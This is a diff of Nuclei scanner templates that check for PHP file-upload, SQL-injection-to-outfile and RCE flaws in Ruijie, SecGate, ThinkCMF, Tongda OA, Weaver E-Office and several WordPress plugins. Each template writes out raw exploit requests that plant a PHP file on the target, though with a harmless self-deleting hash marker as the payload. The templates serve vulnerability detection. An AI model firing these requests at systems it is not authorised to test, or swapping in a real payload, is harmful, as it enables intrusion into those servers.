Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: image/avif Content-Type: image/avif
<?php echo md5("core-chuangtian-cloud"); ?> <?php echo md5("{{string}}");unlink(__FILE__);?>
------WebKitFormBoundaryfcKRltGv-- ------WebKitFormBoundaryfcKRltGv--
- | - |
GET /Upload/test/{{randstr}}.php HTTP/1.1 GET /Upload/test/{{randstr}}.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
matchers: matchers:
- type: dsl - type: word
dsl: part: body_2
- 'contains(body_2, "f0a712e2bcf99c5b0c370b3a4286bb35")' words:
- 'status_code_2 == 200' - '{{md5(string)}}'
condition: and
# digest: 4a0a00473045022066f84a24609e8aff18468dae4751d89b3367da8fbc9482995f7e6a21e3ae3795022100d4a6ce892231c551e62bdf99206ef5fad32891d92eea97c3d5bfd5ff5afc21eb:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022066f84a24609e8aff18468dae4751d89b3367da8fbc9482995f7e6a21e3ae3795022100d4a6ce892231c551e62bdf99206ef5fad32891d92eea97c3d5bfd5ff5afc21eb:922c64590222798bb761d5b6d8e72950

View File

@ -12,10 +12,11 @@ info:
verified: true verified: true
max-request: 2 max-request: 2
fofa-query: app="Ruijie-NBR路由器" fofa-query: app="Ruijie-NBR路由器"
tags: ruijie,file-upload,intrusive,nbr tags: ruijie,fileupload,intrusive,nbr
variables: variables:
filename: "{{rand_base(6)}}" filename: "{{rand_base(6)}}"
string: "{{rand_base(5)}}" string: "ruijie-nbr-fileupload"
http: http:
- raw: - raw:
@ -26,16 +27,15 @@ http:
Content-Disposition: form-data; name="file"; filename="{{filename}}.php" Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
Content-Type: image/jpeg Content-Type: image/jpeg
<?php echo "{{string}}"; unlink(__FILE__); ?> <?php echo md5("{{string}}");unlink(__FILE__);?>
- | - |
GET /ddi/server/upload/{{filename}}.php HTTP/1.1 GET /ddi/server/upload/{{filename}}.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
matchers: matchers:
- type: dsl - type: word
dsl: part: body_2
- status_code_1 == 200 && contains(body_1,"jsonrpc") words:
- status_code_2 == 200 && contains(body_2,"{{string}}") - '{{md5(string)}}'
condition: and
# digest: 4a0a0047304502205aec15506f551f025b3d99fd40a127b9e9c4787e16d32915d121b954cf089721022100d8fe6d2cbdf3db8ebc017eee812656570ec642c8ae99dea9b26c64c427570fee:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502205aec15506f551f025b3d99fd40a127b9e9c4787e16d32915d121b954cf089721022100d8fe6d2cbdf3db8ebc017eee812656570ec642c8ae99dea9b26c64c427570fee:922c64590222798bb761d5b6d8e72950

View File

@ -16,8 +16,8 @@ info:
tags: secgate,3600,firewall,file-upload,intrusive tags: secgate,3600,firewall,file-upload,intrusive
variables: variables:
filename: "{{rand_base(6)}}" filename: "{{rand_base(6)}}"
string: "{{randstr}}"
file-upload: "{{rand_base(5)}}" file-upload: "{{rand_base(5)}}"
string: "secgate-3600-file-upload"
http: http:
- raw: - raw:
@ -37,7 +37,7 @@ http:
Content-Disposition: form-data; name="upfile"; filename="{{filename}}.php" Content-Disposition: form-data; name="upfile"; filename="{{filename}}.php"
Content-Type: text/plain Content-Type: text/plain
<?php echo "{{file-upload}}"; unlink(__FILE__); ?> <?php echo md5("{{string}}");unlink(__FILE__);?>
------WebKitFormBoundary{{string}} ------WebKitFormBoundary{{string}}
Content-Disposition: form-data; name="submit_post" Content-Disposition: form-data; name="submit_post"
@ -54,11 +54,9 @@ http:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: dsl - type: word
dsl: part: body
- status_code_2 == 200 words:
- contains(body_2,'{{file-upload}}') - '{{md5(string)}}'
- contains(header_2,'text/html')
condition: and
# digest: 490a00463044022000f7a446804d16688a2e6bd0ecb4c39abb59795da8559f0eff1c5c086fccd253022048085bb0719b371f98e0f447f501fa1b27dd721f6314c35ff9c42c22058b1d93:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022000f7a446804d16688a2e6bd0ecb4c39abb59795da8559f0eff1c5c086fccd253022048085bb0719b371f98e0f447f501fa1b27dd721f6314c35ff9c42c22058b1d93:922c64590222798bb761d5b6d8e72950

View File

@ -15,21 +15,22 @@ info:
max-request: 2 max-request: 2
tags: thinkcmf,rce,intrusive tags: thinkcmf,rce,intrusive
variables:
string: "thinkcmf-rce"
http: http:
- raw: - raw:
- | - |
GET /index.php?a=fetch&content={{url_encode('<?php file_put_contents(\"{{randstr}}.php\",\"<?php echo phpinfo();\");')}} HTTP/1.1 GET /index.php?a=fetch&content={{url_encode('<?php file_put_contents(\"{{randstr}}.php\",\"<?php echo md5(\"{{string}}\");unlink(__FILE__);\");')}} HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
- | - |
GET /{{randstr}}.php HTTP/1.1 GET /{{randstr}}.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
matchers: matchers:
- type: dsl - type: word
dsl: part: body_2
- 'contains(body_2, "PHP Extension")' words:
- 'contains(body_2, "PHP Version")' - '{{md5(string)}}'
- 'status_code_2 == 200'
condition: and
# digest: 4a0a00473045022100e4c965a9409f38d7dbbfe18f1eb2a8ab388955797a2b6ce7c85402032084204a02204520eb20938068c12dc67cc4f6613dd1c37e0df4374c484a205713243a3f2cd1:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100e4c965a9409f38d7dbbfe18f1eb2a8ab388955797a2b6ce7c85402032084204a02204520eb20938068c12dc67cc4f6613dd1c37e0df4374c484a205713243a3f2cd1:922c64590222798bb761d5b6d8e72950

View File

@ -14,8 +14,9 @@ info:
max-request: 2 max-request: 2
fofa-query: app="TDXK-通达OA" fofa-query: app="TDXK-通达OA"
tags: tongda,fileupload,intrusive,router tags: tongda,fileupload,intrusive,router
variables: variables:
num: "999999999" string: "tongda-action-uploadfile"
http: http:
- raw: - raw:
@ -44,7 +45,7 @@ http:
Content-Disposition: form-data; name="ffff"; filename="test.php" Content-Disposition: form-data; name="ffff"; filename="test.php"
Content-Type: application/octet-stream Content-Type: application/octet-stream
<?php echo md5({{num}});unlink(__FILE__);?> <?php echo md5("{{string}}");unlink(__FILE__);?>
------WebKitFormBoundaryjhddzlqp ------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="mufile" Content-Disposition: form-data; name="mufile"
@ -59,7 +60,7 @@ http:
- type: word - type: word
part: body_2 part: body_2
words: words:
- '{{md5(num)}}' - '{{md5(string)}}'
- type: status - type: status
status: status:

View File

@ -14,9 +14,11 @@ info:
max-request: 2 max-request: 2
fofa-query: app="泛微-EOffice" fofa-query: app="泛微-EOffice"
tags: weaver,e-office,oa,sqli tags: weaver,e-office,oa,sqli
variables: variables:
filename: "{{to_lower(rand_base(5))}}" filename: "{{to_lower(rand_base(5))}}"
payload: "[group]:[1]|[groupid]:[1 union select '<?php echo md5(weaver);?>',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']" string: "weaver-group-xml-sqli"
payload: "[group]:[1]|[groupid]:[1 union select '<?php echo md5(\"{{string}}\");unlink(__FILE__);?>',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']"
http: http:
- raw: - raw:
@ -33,7 +35,7 @@ http:
- type: word - type: word
part: body_2 part: body_2
words: words:
- "758058d8987e7a9ec723bcdbec6c407e" - '{{md5(string)}}'
- type: status - type: status
status: status:

View File

@ -14,7 +14,7 @@ info:
tags: weaver,e-office,intrusive,rce,file-upload tags: weaver,e-office,intrusive,rce,file-upload
variables: variables:
filename: "{{to_lower(rand_base(5))}}" filename: "{{to_lower(rand_base(5))}}"
string: "{{randstr}}" string: "weaver-lazyuploadify-file-upload"
http: http:
- raw: - raw:
@ -33,7 +33,7 @@ http:
Content-Disposition: form-data; name="Filedata"; filename="{{filename}}.php" Content-Disposition: form-data; name="Filedata"; filename="{{filename}}.php"
Content-Type: application/octet-stream Content-Type: application/octet-stream
<?php echo "{{string}}";unlink(__FILE__);?> <?php echo md5("{{string}}");unlink(__FILE__);?>
------WebKitFormBoundaryjetvpuye-- ------WebKitFormBoundaryjetvpuye--
- | - |
GET /attachment/{{attachmentID}}/{{attachmentName}} HTTP/1.1 GET /attachment/{{attachmentID}}/{{attachmentName}} HTTP/1.1
@ -58,8 +58,11 @@ http:
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- "status_code_1 == 200"
- "contains(body_2, 'attachmentID') && contains(body_2, 'attachmentName')" - "contains(body_2, 'attachmentID') && contains(body_2, 'attachmentName')"
- "status_code_3 == 200 && contains(body_3,'{{randstr}}')"
condition: and condition: and
- type: word
part: body_3
words:
- '{{md5(string)}}'
# digest: 4b0a00483046022100b1ecbee09f268b25db456fc80be7fb4e0436700a30c52c333959bad8e6396eaa022100ecdc3c2a0b7b463361a617fa59de8766cc175aa00c02f53aab647db22bf0b837:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100b1ecbee09f268b25db456fc80be7fb4e0436700a30c52c333959bad8e6396eaa022100ecdc3c2a0b7b463361a617fa59de8766cc175aa00c02f53aab647db22bf0b837:922c64590222798bb761d5b6d8e72950

View File

@ -15,6 +15,7 @@ info:
tags: weaver,e-office,oa,rce,intrusive,fileupload tags: weaver,e-office,oa,rce,intrusive,fileupload
variables: variables:
filename: "{{to_lower(rand_base(5))}}" filename: "{{to_lower(rand_base(5))}}"
string: "weaver-office-server-file-upload"
http: http:
- raw: - raw:
@ -30,7 +31,7 @@ http:
Content-Disposition: form-data;name="FileData";filename="{{filename}}.php" Content-Disposition: form-data;name="FileData";filename="{{filename}}.php"
Content-Type: application/octet-stream Content-Type: application/octet-stream
<?php echo md5(weaver);?>' <?php echo md5("{{string}}");unlink(__FILE__);?>
------WebKitFormBoundaryLpoiBFy4ANA8daew ------WebKitFormBoundaryLpoiBFy4ANA8daew
Content-Disposition: form-data;name="FormData" Content-Disposition: form-data;name="FormData"
@ -46,7 +47,7 @@ http:
- type: word - type: word
part: body_2 part: body_2
words: words:
- "758058d8987e7a9ec723bcdbec6c407e" - '{{md5(string)}}'
- type: status - type: status
status: status:

View File

@ -11,10 +11,11 @@ info:
verified: true verified: true
max-request: 3 max-request: 3
fofa-query: app="泛微-EOffice" fofa-query: app="泛微-EOffice"
tags: weaver,e-office,oa,instrusive,rce,intrusive tags: weaver,e-office,oa,intrusive,rce,intrusive,fileupload
variables: variables:
filename: "{{to_lower(rand_base(5))}}" filename: "{{to_lower(rand_base(5))}}"
string: "{{randstr}}" string: "weaver-uploadify-file-upload"
http: http:
- raw: - raw:
@ -33,7 +34,7 @@ http:
Content-Disposition: form-data; name="Filedata"; filename="{{filename}}.php" Content-Disposition: form-data; name="Filedata"; filename="{{filename}}.php"
Content-Type: application/octet-stream Content-Type: application/octet-stream
<?php echo "{{randstr}}";unlink(__FILE__);?> <?php echo md5("{{string}}");unlink(__FILE__);?>
------WebKitFormBoundaryjetvpuye-- ------WebKitFormBoundaryjetvpuye--
- | - |
GET /attachment/personal/_temp.php HTTP/1.1 GET /attachment/personal/_temp.php HTTP/1.1
@ -43,8 +44,11 @@ http:
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- "status_code_1 == 200"
- "contains(body_2, 'imageSrc') && contains(body_2, 'height')" - "contains(body_2, 'imageSrc') && contains(body_2, 'height')"
- "status_code_3 == 200 && contains(body_3,'{{randstr}}')"
condition: and condition: and
- type: word
part: body_3
words:
- '{{md5(string)}}'
# digest: 4b0a00483046022100b9ada8f5c9c7c9375352c42246f9fb09f686f69dd499c02fe7b5ebb77c3d48d9022100e417a1341b83b7240f1c5a0bf814d5b9931112064dc0317b19fd6f0e2647a6c6:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100b9ada8f5c9c7c9375352c42246f9fb09f686f69dd499c02fe7b5ebb77c3d48d9022100e417a1341b83b7240f1c5a0bf814d5b9931112064dc0317b19fd6f0e2647a6c6:922c64590222798bb761d5b6d8e72950

View File

@ -19,6 +19,9 @@ info:
max-request: 2 max-request: 2
tags: wpscan,edb,wordpress,wp,wp-plugin,fileupload,intrusive,3dprint tags: wpscan,edb,wordpress,wp,wp-plugin,fileupload,intrusive,3dprint
variables:
string: "3dprint-arbitrary-file-upload"
http: http:
- raw: - raw:
- | - |
@ -35,18 +38,16 @@ http:
Content-Disposition: form-data; name="file"; filename={{randstr}}.php Content-Disposition: form-data; name="file"; filename={{randstr}}.php
Content-Type: text/php Content-Type: text/php
<?php echo '3DPrint-arbitrary-file-upload'; ?> <?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------54331109111293931601238262353-- -----------------------------54331109111293931601238262353--
- | - |
GET /wp-content/uploads/p3d/{{randstr}}.php HTTP/1.1 GET /wp-content/uploads/p3d/{{randstr}}.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
matchers: matchers:
- type: dsl - type: word
dsl: part: body_2
- 'contains(header_2, "text/html")' words:
- "status_code_2 == 200" - '{{md5(string)}}'
- "contains(body_2, '3DPrint-arbitrary-file-upload')"
condition: and
# digest: 490a0046304402204014e03adf59b73d5219aa2cf87a8a95ae9a277a296473ccbfb68c7d86e10fce022023c5fa1f1eee7bce47ce0038c7bb17f30859773a2017a1db43e095fb48f8a3d0:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402204014e03adf59b73d5219aa2cf87a8a95ae9a277a296473ccbfb68c7d86e10fce022023c5fa1f1eee7bce47ce0038c7bb17f30859773a2017a1db43e095fb48f8a3d0:922c64590222798bb761d5b6d8e72950

View File

@ -17,6 +17,9 @@ info:
max-request: 2 max-request: 2
tags: wp-plugin,rce,fileupload,unauth,wpscan,msf,wordpress,ait-csv,wp,intrusive tags: wp-plugin,rce,fileupload,unauth,wpscan,msf,wordpress,ait-csv,wp,intrusive
variables:
string: "ait-csv-import-export-rce"
http: http:
- raw: - raw:
- | - |
@ -29,7 +32,7 @@ http:
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: application/octet-stream Content-Type: application/octet-stream
sep=;<?php echo md5('ait-csv-import-export-rce');?> sep=;<?php echo md5("{{string}}");unlink(__FILE__);?>
--------------------------ab360007dbae2de8-- --------------------------ab360007dbae2de8--
- | - |
@ -39,12 +42,8 @@ http:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body_2
words: words:
- "fe394b60dc324c3bac3060d600ad4349" - '{{md5(string)}}'
- type: status
status:
- 200
# digest: 490a004630440220644f99faec006ef48de167e6e9a5c70b704d0a180dfac6ac88341eb2dcecc7780220396204420fb32c1f832b3e122af2ba85db50e034b7ffbb70e1dee8fb7752a18f:922c64590222798bb761d5b6d8e72950 # digest: 490a004630440220644f99faec006ef48de167e6e9a5c70b704d0a180dfac6ac88341eb2dcecc7780220396204420fb32c1f832b3e122af2ba85db50e034b7ffbb70e1dee8fb7752a18f:922c64590222798bb761d5b6d8e72950

View File

@ -15,8 +15,10 @@ info:
metadata: metadata:
max-request: 3 max-request: 3
tags: wp,wpscan,wordpress,wp-plugin,rce,intrusive,fileupload tags: wp,wpscan,wordpress,wp-plugin,rce,intrusive,fileupload
variables: variables:
filepath: '{{rand_base(7, "abcdefghi")}}' filepath: '{{rand_base(7, "abcdefghi")}}'
string: "wordpress-rce-simplefilelist"
http: http:
- raw: - raw:
@ -46,7 +48,7 @@ http:
Content-Disposition: form-data; name="file"; filename="{{filepath}}.png" Content-Disposition: form-data; name="file"; filename="{{filepath}}.png"
Content-Type: image/png Content-Type: image/png
<?php echo md5("wordpress-rce-simplefilelist"); phpinfo(); ?> <?php echo md5("{{string}}");unlink(__FILE__);?>
--6985fa39c0698d07f6d418b37388e1b2-- --6985fa39c0698d07f6d418b37388e1b2--
- | - |
POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1 POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
@ -63,12 +65,9 @@ http:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body_3
words: words:
- "aa5be3e9dec96f2f1a593b2f5b2288af" - '{{md5(string)}}'
- "PHP Version"
- "Configuration Command"
condition: and
- type: status - type: status
status: status:

View File

@ -14,11 +14,13 @@ info:
verified: true verified: true
max-request: 2 max-request: 2
publicwww-query: "/wp-content/plugins/kadence-blocks/" publicwww-query: "/wp-content/plugins/kadence-blocks/"
tags: rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks,file-upload,intrusive tags: rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks,fileupload,intrusive
variables: variables:
str: "{{to_lower(rand_text_alpha(5))}}" str: "{{to_lower(rand_text_alpha(5))}}"
email: "{{rand_base(8)}}@{{rand_base(5)}}.com" email: "{{rand_base(8)}}@{{rand_base(5)}}.com"
filename: "{{to_lower(rand_text_alpha(5))}}" filename: "{{to_lower(rand_text_alpha(5))}}"
string: "wp-kadence-blocks-rce"
http: http:
- raw: - raw:
@ -48,7 +50,7 @@ http:
GIF89a GIF89a
<?php echo md5("{{randstr}}");?> <?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------8779924633391890046425977712 -----------------------------8779924633391890046425977712
Content-Disposition: form-data; name="_kb_adv_form_post_id" Content-Disposition: form-data; name="_kb_adv_form_post_id"